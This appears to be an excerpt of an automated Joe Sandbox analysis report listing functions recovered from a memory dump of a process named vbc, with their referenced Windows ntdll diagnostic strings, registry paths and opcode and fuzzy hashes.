                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: 513596e18ded363fc935bf57ff149fd4b15d3fc53044d882cbbdf82f140c1c35
                            • Instruction ID: 1c0b9764833fc850a9316bae6c2d587336ab224aa735b56e951395c087e44c2c
                            • Opcode Fuzzy Hash: 513596e18ded363fc935bf57ff149fd4b15d3fc53044d882cbbdf82f140c1c35
                            • Instruction Fuzzy Hash: 6AB09B779015C5D5FA11E7704B08B17791577D0701F65C461D2131641E477CC1D1E575

                            Non-executed Functions

                            Function 05198620 Relevance: 17.7, Strings: 14, Instructions: 223COMMON
                            Download Yara Rule
                            Strings
                            • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 051D540A, 051D5496, 051D5519
                            • Thread identifier, xrefs: 051D553A
                            • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 051D54E2
                            • Critical section address., xrefs: 051D5502
                            • double initialized or corrupted critical section, xrefs: 051D5508
                            • Address of the debug info found in the active list., xrefs: 051D54AE, 051D54FA
                            • Critical section debug info address, xrefs: 051D541F, 051D552E
                            • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 051D54CE
                            • Thread is in a state in which it cannot own a critical section, xrefs: 051D5543
                            • Invalid debug info address of this critical section, xrefs: 051D54B6
                            • undeleted critical section in freed memory, xrefs: 051D542B
                            • corrupted critical section, xrefs: 051D54C2
                            • Critical section address, xrefs: 051D5425, 051D54BC, 051D5534
                            • 8, xrefs: 051D52E3
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                            • API String ID: 0-2368682639
                            • Opcode ID: f3a2c1f8176ee6bed1615b46f8d6b11939912282a2dcd7433900fa0daedd41d7
                            • Instruction ID: f16b78d7fbcd347145682849f31e4c676410fa126886597707ffe3f4c8b8dcf4
                            • Opcode Fuzzy Hash: f3a2c1f8176ee6bed1615b46f8d6b11939912282a2dcd7433900fa0daedd41d7
                            • Instruction Fuzzy Hash: BB8179B1A40358FFDB24CF94C845FAEBBB6BB08B14F154119FA05BB680D375A941DB60
                            Function 051F9179 Relevance: 10.4, Strings: 8, Instructions: 401COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID: %s\%ld\%s$%s\%u-%u-%u-%u$AppContainerNamedObjects$BaseNamedObjects$Global\Session\%ld%s$\AppContainerNamedObjects$\BaseNamedObjects$\Sessions
                            • API String ID: 0-3063724069
                            • Opcode ID: 08df832057a323e4a63c0af024405cb33211e33fe0ab8dd387786e319d898373
                            • Instruction ID: 44be6122b10b9e435bc2df6d96411f5497b5d8b01d6c434374d8df9430a95999
                            • Opcode Fuzzy Hash: 08df832057a323e4a63c0af024405cb33211e33fe0ab8dd387786e319d898373
                            • Instruction Fuzzy Hash: DED112B2908311AFD732EA68C844BABB7E9BF84724F040929FB84A7151D374CD45CB92
                            Function 0515D08D Relevance: 10.2, Strings: 8, Instructions: 249COMMON
                            Download Yara Rule
                            Strings
                            • @, xrefs: 0515D313
                            • Control Panel\Desktop\MuiCached\MachineLanguageConfiguration, xrefs: 0515D262
                            • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration, xrefs: 0515D2C3
                            • @, xrefs: 0515D2AF
                            • Software\Policies\Microsoft\Control Panel\Desktop, xrefs: 0515D146
                            • Control Panel\Desktop\LanguageConfiguration, xrefs: 0515D196
                            • @, xrefs: 0515D0FD
                            • \Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 0515D0CF
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID: @$@$@$Control Panel\Desktop\LanguageConfiguration$Control Panel\Desktop\MuiCached\MachineLanguageConfiguration$Software\Policies\Microsoft\Control Panel\Desktop$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration
                            • API String ID: 0-1356375266
                            • Opcode ID: 0b3e7e44d08277d2918d197580542876650090ee492315991fc220095a99fc12
                            • Instruction ID: 7109499b59975fa3d0d0a84ba4bdb567af9a4998b770377ed506bb82726ab4a6
                            • Opcode Fuzzy Hash: 0b3e7e44d08277d2918d197580542876650090ee492315991fc220095a99fc12
                            • Instruction Fuzzy Hash: 3FA17071A08305DFE721DF25D484BABB7E9BF84725F00492EF9A496240E774DA08CB53
                            Function 0515F172 Relevance: 8.2, Strings: 6, Instructions: 684COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                            • API String ID: 0-523794902
                            • Opcode ID: b13d096f6dccb6ff58e772f38f824035e63156b37670243a553ab2648a4f27bc
                            • Instruction ID: 369eaeb82b040f7d4efa6cf57127d6a955aae06df4328dfe25239978de8c3e32
                            • Opcode Fuzzy Hash: b13d096f6dccb6ff58e772f38f824035e63156b37670243a553ab2648a4f27bc
                            • Instruction Fuzzy Hash: E542F2B5208341DFD715CF28C488BAABBE6FF84614F144A6DF8A68B352D774D842CB52
                            Function 0517B1B0 Relevance: 7.8, Strings: 6, Instructions: 350COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
                            • API String ID: 0-122214566
                            • Opcode ID: 15e6d8613f09ef362a0ec1425d5258fe4c795751d6684933677d362b01b9d64b
                            • Instruction ID: b009fa42e264d925df22098343ded0d939bd2f9bf1e6de0819ac98548c22921c
                            • Opcode Fuzzy Hash: 15e6d8613f09ef362a0ec1425d5258fe4c795751d6684933677d362b01b9d64b
                            • Instruction Fuzzy Hash: 1EC12C71B08219ABDB25DB6CC895F7EBBB6FF45300F1541A9E8029B281EB74DD44C391
                            Function 0520F525 Relevance: 7.7, Strings: 6, Instructions: 231COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
                            • API String ID: 0-1745908468
                            • Opcode ID: 31c74ee6e8237bf820ae16ac736d741e9dd428efe2158532ec24143e2bb1f9e5
                            • Instruction ID: d17f8012d5fe6c559c24383c1583ec8a2cd4a4fc3e3b253454efbffd097d9fae
                            • Opcode Fuzzy Hash: 31c74ee6e8237bf820ae16ac736d741e9dd428efe2158532ec24143e2bb1f9e5
                            • Instruction Fuzzy Hash: 57914431A25341DFCB21DF68C545AADFBF2FF49710F088019E85AAB2A3CB719980CB50
                            Function 0515645D Relevance: 7.6, Strings: 6, Instructions: 150COMMON
                            Download Yara Rule
                            Strings
                            • Getting the shim engine exports failed with status 0x%08lx, xrefs: 051B9A01
                            • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 051B9A2A
                            • LdrpInitShimEngine, xrefs: 051B99F4, 051B9A07, 051B9A30
                            • minkernel\ntdll\ldrinit.c, xrefs: 051B9A11, 051B9A3A
                            • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 051B99ED
                            • apphelp.dll, xrefs: 05156496
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                            • API String ID: 0-204845295
                            • Opcode ID: c801d4c2ccfe868d77628064fede44fc602484a1ea26b90392193392eb3afcea
                            • Instruction ID: 4ec04c874e085fdd186a9cdee8615694f330913e876228914e23a65bf2004975
                            • Opcode Fuzzy Hash: c801d4c2ccfe868d77628064fede44fc602484a1ea26b90392193392eb3afcea
                            • Instruction Fuzzy Hash: 6A51E171218304DFE324DF24D849BABBBE9FF84690F400919FA969B191DB70E945CB92
                            Function 05192674 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                            Download Yara Rule
                            Strings
                            • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 051D2180
                            • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 051D2178
                            • SXS: %s() passed the empty activation context, xrefs: 051D2165
                            • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 051D21BF
                            • RtlGetAssemblyStorageRoot, xrefs: 051D2160, 051D219A, 051D21BA
                            • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 051D219F
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                            • API String ID: 0-861424205
                            • Opcode ID: e5bda00a78397243ba5b2fd0d71ab68412fa5d64163d252a5711c73d7f2384f7
                            • Instruction ID: f37c92723fa6f634a9b6b0db386acb8ce5f9f58c4beb1dc1bc3fa4a46f89d36f
                            • Opcode Fuzzy Hash: e5bda00a78397243ba5b2fd0d71ab68412fa5d64163d252a5711c73d7f2384f7
                            • Instruction Fuzzy Hash: D631663EF0021577EB29DA948C45F6FB779EBA1A80F054058BA31BB240D370AE01CBA0
                            Function 0519C6A6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                            Download Yara Rule
                            Strings
                            • LdrpInitializeImportRedirection, xrefs: 051D8177, 051D81EB
                            • minkernel\ntdll\ldrinit.c, xrefs: 0519C6C3
                            • minkernel\ntdll\ldrredirect.c, xrefs: 051D8181, 051D81F5
                            • Loading import redirection DLL: '%wZ', xrefs: 051D8170
                            • LdrpInitializeProcess, xrefs: 0519C6C4
                            • Unable to build import redirection Table, Status = 0x%x, xrefs: 051D81E5
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                            • API String ID: 0-475462383
                            • Opcode ID: 5b6f95ac57f9e799d43020d2eee734bc951ec85876f219cb69c2e902dab7ac3c
                            • Instruction ID: ce4cb8118ae3046505c0fcc778717e7b5aced1d6baa86cb16487506508447de8
                            • Opcode Fuzzy Hash: 5b6f95ac57f9e799d43020d2eee734bc951ec85876f219cb69c2e902dab7ac3c
                            • Instruction Fuzzy Hash: EE311571744345AFC224EF28DC4AE2AB795EF84B14F000958F9856B2D2DB30ED04CBA2
                            Function 0518F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                            Download Yara Rule
                            Strings
                            • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 051D02BD
                            • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 051D02E7
                            • RTL: Re-Waiting, xrefs: 051D031E
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                            • API String ID: 0-2474120054
                            • Opcode ID: d76be9f6b3af48f08c0965c6f30e265d64c2832749438b1be4f44443f012426b
                            • Instruction ID: c386ca80f2389da4ca128fbd365bdc7645b5d34c02c0699138ea74412bb7df26
                            • Opcode Fuzzy Hash: d76be9f6b3af48f08c0965c6f30e265d64c2832749438b1be4f44443f012426b
                            • Instruction Fuzzy Hash: 53E1B0316087419FD735EF28C888B2AB7E1BF88314F140A1DF5A68B2D1E774E946CB52
                            Function 051851EF Relevance: 6.7, Strings: 5, Instructions: 434COMMON
                            Download Yara Rule
                            Strings
                            • Kernel-MUI-Number-Allowed, xrefs: 05185247
                            • Kernel-MUI-Language-Allowed, xrefs: 0518527B
                            • Kernel-MUI-Language-Disallowed, xrefs: 05185352
                            • Kernel-MUI-Language-SKU, xrefs: 0518542B
                            • WindowsExcludedProcs, xrefs: 0518522A
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                            • API String ID: 0-258546922
                            • Opcode ID: 61f2c6531cfb2bb54c2be2ff8c2ce8fcc1b007282f5258cfac00ce21d831d2a4
                            • Instruction ID: 9a6563be510ac69f84dbcfc858a6538a3eea747a5a1c2f86b3c5e1f145b7c145
                            • Opcode Fuzzy Hash: 61f2c6531cfb2bb54c2be2ff8c2ce8fcc1b007282f5258cfac00ce21d831d2a4
                            • Instruction Fuzzy Hash: BCF15E76E04219EBCB25EFA8C984DEEBBBAFF08650F52445AE501E7211D7749E01CF90
                            Function 0518D7B0 Relevance: 6.4, Strings: 5, Instructions: 151COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID: $$$$LdrShutdownProcess$Process 0x%p (%wZ) exiting$minkernel\ntdll\ldrinit.c
                            • API String ID: 0-1975516107
                            • Opcode ID: 23b60f2bddd2b17cedeefd4a4eaf8a480254a880254037100bafc869db71bd7e
                            • Instruction ID: c32fc86087e79e1f7ad1966d33ca93b1467a8f59943cb36cd96301c3f495c1b7
                            • Opcode Fuzzy Hash: 23b60f2bddd2b17cedeefd4a4eaf8a480254a880254037100bafc869db71bd7e
                            • Instruction Fuzzy Hash: 3951CE71E043499FDB24EFA8E489BAEBBB2BF45314F144159E4026B2C1DB70A985CF90
                            Function 051576B2 Relevance: 6.3, Strings: 5, Instructions: 51COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlFreeHeap
                            • API String ID: 0-3061284088
                            • Opcode ID: 36bf69db9b5e894df41dde93d224017e480663d26682529dee5aaddef05ee584
                            • Instruction ID: 9ef2d9f561330d1b5926dbc70ba82e43e15a2c4b35d5e0ae08ec463dfb7a75bb
                            • Opcode Fuzzy Hash: 36bf69db9b5e894df41dde93d224017e480663d26682529dee5aaddef05ee584
                            • Instruction Fuzzy Hash: 2101FC7221D240DFE329A729E41FFB6BBE4EF43A30F15405AF51647992CBF49884D160
                            Function 051770C0 Relevance: 6.0, Strings: 3, Instructions: 2248COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                            • API String ID: 0-3178619729
                            • Opcode ID: 1392516984b76a26da3607ea242a81ffce7fce5e7802d69bc30b97bd6fbf8448
                            • Instruction ID: 8cde917c456c03a9134530a5b1a828b85b1d0b14a5732950ca80164e8e82b686
                            • Opcode Fuzzy Hash: 1392516984b76a26da3607ea242a81ffce7fce5e7802d69bc30b97bd6fbf8448
                            • Instruction Fuzzy Hash: 4013BF70A04659DFDB29CF6CC494BA9BBF2FF49304F1481A9D85AAB381D734A941CF90
                            Function 05171070 Relevance: 5.9, Strings: 4, Instructions: 940COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID: !(CheckedFlags & ~HEAP_CREATE_VALID_MASK)$@$HEAP: $HEAP[%wZ]:
                            • API String ID: 0-3570731704
                            • Opcode ID: da6acc780b53238b3e7f911c6e552f92a957f9424e8d84fbbd5019f2a880b5c4
                            • Instruction ID: 54a5def22246baafc1dd9e6984a8ef777afeedd1ff7a08416c327fc5dd86fef2
                            • Opcode Fuzzy Hash: da6acc780b53238b3e7f911c6e552f92a957f9424e8d84fbbd5019f2a880b5c4
                            • Instruction Fuzzy Hash: 61925C71A44368DFEB24CF18C885FA9B7B6BF45350F1681E9D949AB281D730AE80CF51
                            Function 05198402 Relevance: 5.3, Strings: 4, Instructions: 263COMMON
                            Download Yara Rule
                            Strings
                            • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 0519855E
                            • @, xrefs: 05198591
                            • minkernel\ntdll\ldrinit.c, xrefs: 05198421
                            • LdrpInitializeProcess, xrefs: 05198422
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                            • API String ID: 0-1918872054
                            • Opcode ID: 4ea0e95bee593c7b9f9f75e0b7c64dc93e639a24642dc6259a1ff498b530e35f
                            • Instruction ID: 787a8889343bf3e94edf6b17732096083882f50530ad679cdcffb4255badba4c
                            • Opcode Fuzzy Hash: 4ea0e95bee593c7b9f9f75e0b7c64dc93e639a24642dc6259a1ff498b530e35f
                            • Instruction Fuzzy Hash: B5919172648344BFEB22DF60CC95FABBAE9BF85644F40092DF68492151E734D904CB62
                            Function 0519273C Relevance: 5.2, Strings: 4, Instructions: 249COMMON
                            Download Yara Rule
                            Strings
                            • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 051D21D9, 051D22B1
                            • .Local, xrefs: 051928D8
                            • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 051D22B6
                            • SXS: %s() passed the empty activation context, xrefs: 051D21DE
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                            • API String ID: 0-1239276146
                            • Opcode ID: 61f8f1a9b8cbe675bc7e44a00aed9a57263ae19b0bdf04e1580e17a38c05d256
                            • Instruction ID: 5c53eac0220769c59aa45122d198f648dd21fc615eeffc1031c41ce421c0922b
                            • Opcode Fuzzy Hash: 61f8f1a9b8cbe675bc7e44a00aed9a57263ae19b0bdf04e1580e17a38c05d256
                            • Instruction Fuzzy Hash: B6A1A639A4422AEBCF38CF54DC84BA9B3B1BF58314F5545E9E829A7251D7309E81CF90
                            Function 051664AB Relevance: 5.2, Strings: 4, Instructions: 211COMMON
                            Download Yara Rule
                            Strings
                            • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 051C1028
                            • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 051C106B
                            • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 051C10AE
                            • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 051C0FE5
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                            • API String ID: 0-1468400865
                            • Opcode ID: 5075e731b92aa425979392221c30027b5e7c6fc6907df5c6e764151dc245bbd2
                            • Instruction ID: 9b1c1dbe16d78055284b1d1e199220cd864d9860373b2000f20f1e4124069c84
                            • Opcode Fuzzy Hash: 5075e731b92aa425979392221c30027b5e7c6fc6907df5c6e764151dc245bbd2
                            • Instruction Fuzzy Hash: 3B71CFB1A04344AFCB20DF14C889FAB7FA9AF857A4F000468F9488B247D775D598CBD2
                            Function 0515F626 Relevance: 5.2, Strings: 4, Instructions: 188COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
                            • API String ID: 0-2586055223
                            • Opcode ID: de2bada58936dda6e3189706788ddbc8f8b4bc8affd85166cbb8fed3a3aea832
                            • Instruction ID: b3a89fa4c686fe575200134d7e946bf2ad5254f60bdb4ce0f57bf71b55d71d4a
                            • Opcode Fuzzy Hash: de2bada58936dda6e3189706788ddbc8f8b4bc8affd85166cbb8fed3a3aea832
                            • Instruction Fuzzy Hash: 4B61F476308684EFE721DB28C848FA777EAFF40720F050968E9658B292D774D945C762
                            Function 052111A4 Relevance: 5.1, Strings: 4, Instructions: 113COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
                            • API String ID: 0-336120773
                            • Opcode ID: 17ca7fccc01fd42b96756c31d14b1d1c9e14a3c8c26d72723d40061134e64857
                            • Instruction ID: c4bbd3c0692089a969d6b262986133c206d6d1de4f8999e05b19ee9b064ea985
                            • Opcode Fuzzy Hash: 17ca7fccc01fd42b96756c31d14b1d1c9e14a3c8c26d72723d40061134e64857
                            • Instruction Fuzzy Hash: 3B31E372225121EFDB11DB98C885FAB77E9FF15A20F240055FE16CF291D770AC50CA58
                            Function 0518245A Relevance: 5.1, Strings: 4, Instructions: 111COMMON
                            Download Yara Rule
                            Strings
                            • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 051CA992
                            • LdrpDynamicShimModule, xrefs: 051CA998
                            • minkernel\ntdll\ldrinit.c, xrefs: 051CA9A2
                            • apphelp.dll, xrefs: 05182462
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                            • API String ID: 0-176724104
                            • Opcode ID: 958356538120644af58644c0a6daef10f790639baed5a838cb5156047e1e333c
                            • Instruction ID: 586e1e8269b306fe3eda6c48d3a318e79f3686e901707b0039437d986dd8c150
                            • Opcode Fuzzy Hash: 958356538120644af58644c0a6daef10f790639baed5a838cb5156047e1e333c
                            • Instruction Fuzzy Hash: 34312771710305ABD726DF68A84EE7AFFB5FF90710F560499F9116B280CBB19881CB90
                            Function 05159148 Relevance: 5.1, Strings: 4, Instructions: 100COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID: HEAP: $HEAP[%wZ]: $VirtualProtect Failed 0x%p %x$VirtualQuery Failed 0x%p %x
                            • API String ID: 0-1391187441
                            • Opcode ID: fdc6c1dec2facdf8f7186b0a37bc8e510c495fefe5c7ece072b87bb2993b595b
                            • Instruction ID: cdea0fe524bcf22056618321d2d052653b964f020957e014fb06fe31e5ca98ab
                            • Opcode Fuzzy Hash: fdc6c1dec2facdf8f7186b0a37bc8e510c495fefe5c7ece072b87bb2993b595b
                            • Instruction Fuzzy Hash: DD31FE72A04214EFDB11DB54C889FEEB7B9FF45A30F154061E821AB291D7B0E940CA61
                            Function 052094E0 Relevance: 4.3, Strings: 3, Instructions: 558COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID: $ $0
                            • API String ID: 0-3352262554
                            • Opcode ID: e6b2a7a8f11ffd8ae381db37daf742f5525f9965b8caf38c0476b91ebbe6ea27
                            • Instruction ID: c84734090bf31cb5b29407df71fdd2feb20dc2f2e3c2bd601a1bc26e49b2fcf1
                            • Opcode Fuzzy Hash: e6b2a7a8f11ffd8ae381db37daf742f5525f9965b8caf38c0476b91ebbe6ea27
